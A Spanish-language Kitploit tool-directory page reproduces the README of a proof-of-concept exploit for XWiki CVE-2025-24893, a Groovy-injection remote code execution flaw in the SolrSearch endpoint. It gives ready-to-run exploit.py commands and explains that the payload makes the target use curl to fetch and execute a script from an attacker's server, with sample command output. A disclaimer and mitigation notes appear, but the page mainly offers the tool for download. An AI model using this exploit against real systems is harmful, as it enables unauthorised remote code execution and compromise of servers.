Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

FeedsContactoPrivacidad© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
xwiki-cve-2025-24893-poc — PoC para CVE-2025-24893 | Kitploit
Herramientas/GitHubGitHub/570rmbr3ak3r/xwiki-cve-2025-24893-poc
Generación de PayloadsAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHub570rmbr3ak3r/xwiki-cve-2025-24893-poc

xwiki-cve-2025-24893-poc

PoC para CVE-2025-24893

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Ver Repositorio
3111hace 1 añoAún no revisado
Compartir

PoC de Exploit RCE en XWiki (CVE-2025-24893)

Descripción general

Este repositorio contiene una Prueba de Concepto (PoC) del exploit para la vulnerabilidad de Ejecución Remota de Código (RCE) en XWiki identificada como CVE-2025-24893. La vulnerabilidad permite a un atacante ejecutar código arbitrario en una instancia de XWiki objetivo aprovechando una solicitud manipulada al endpoint SolrSearch. Este script admite objetivos tanto HTTP como HTTPS.

⚠️ Aviso: Esta PoC está destinada únicamente a fines educativos y de investigación. El uso no autorizado de este código contra sistemas sin permiso explícito es ilegal y poco ético. Obtenga siempre la autorización adecuada antes de probar cualquier sistema.

Detalles de la vulnerabilidad

  • ID CVE: CVE-2025-24893
  • Componente afectado: endpoint SolrSearch de XWiki
  • Impacto: Ejecución Remota de Código (RCE)
  • Aviso: Aviso de seguridad de GitHub

La vulnerabilidad surge debido a un manejo incorrecto de la entrada del usuario en el endpoint SolrSearch, lo que permite la inyección de código Groovy a través de un payload manipulado. Esta PoC demuestra cómo un atacante puede explotar esto para ejecutar comandos arbitrarios en el servidor objetivo.

Requisitos previos

  • Python 3.x
  • Bibliotecas de Python necesarias: requests, argparse, urllib.parse, re, html
  • Una instancia de XWiki objetivo vulnerable a CVE-2025-24893
  • Un servidor controlado por el atacante para alojar el script bash, accesible mediante HTTP o HTTPS
  • Un archivo que contenga el código a ejecutar en el objetivo

Instalación

  1. Clone este repositorio:
    git clone https://github.com/570RMBR3AK3R/xwiki-cve-2025-24893-poc.git
    
  2. Instale las bibliotecas de Python necesarias:
    pip install requests
    

Uso

El script envía una solicitud HTTP/HTTPS manipulada a la instancia de XWiki objetivo, inyectando un payload Groovy que ejecuta un comando curl para recuperar y ejecutar un archivo desde un servidor controlado por el atacante.

Ejecute el script con el siguiente comando:

python3 exploit.py --url <target_url> --server <attacker_server> --file <malicious_file> [--no-verify]

Argumentos

  • --url: La URL base de la instancia de XWiki objetivo (ej. http://target o https://target).
  • --server: La IP o nombre de host del servidor del atacante, incluyendo el puerto si es necesario (ej. 192.168.1.100:8080). Soporta tanto HTTP como HTTPS.
  • --file: El nombre del archivo en el servidor del atacante que contiene el código a ejecutar (ej. exploit.sh).
  • --no-verify: Bandera opcional para deshabilitar la verificación SSL en objetivos HTTPS (usar con precaución, solo para pruebas).

Ejemplo

python3 exploit.py --url http(s)://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh

Para omitir la verificación SSL (por ejemplo, para certificados autofirmados):

python3 exploit.py --url https://vulnerable-xwiki.com --server http(s)://192.168.1.100:8080 --file exploit.sh --no-verify

Esto hará lo siguiente:

  1. Construirá un payload que utiliza el script Groovy para ejecutar un comando curl.
  2. Recuperará el archivo especificado (exploit.sh) desde el servidor del atacante (http(s)://192.168.1.100:8080).
  3. Ejecutará el archivo recuperado en el sistema objetivo.
  4. Extraerá y mostrará la salida, limpiando cualquier etiqueta HTML y entidad.

Salida

El script extrae la respuesta del objetivo, elimina las etiquetas HTML (ej. <br/>, <del>), y convierte las entidades HTML a texto plano para facilitar la lectura. La salida limpia se imprime en la consola.

Ejemplo

python3 exploit.py --url http://<redacted> --server http://<redacted>:8080 --file exploit.sh 
uid=997(xwiki) gid=997(xwiki) groups=997(xwiki)

Limitaciones

  • La instancia de XWiki objetivo debe ser vulnerable a CVE-2025-24893.
  • El servidor del atacante debe ser accesible desde el sistema objetivo mediante HTTP o HTTPS.
  • El script asume que el servidor objetivo soporta el endpoint SolrSearch y la ejecución de Groovy.

Mitigación

Para protegerse contra esta vulnerabilidad:

  • Actualice XWiki a la última versión parcheada.
  • Consulte el Aviso de seguridad de GitHub para obtener pasos detallados de mitigación.
  • Blog de referencia CVE-2025-24893

Licencia

Este proyecto está licenciado bajo la Licencia MIT. Consulte el archivo LICENSE para más detalles.

Descargar herramienta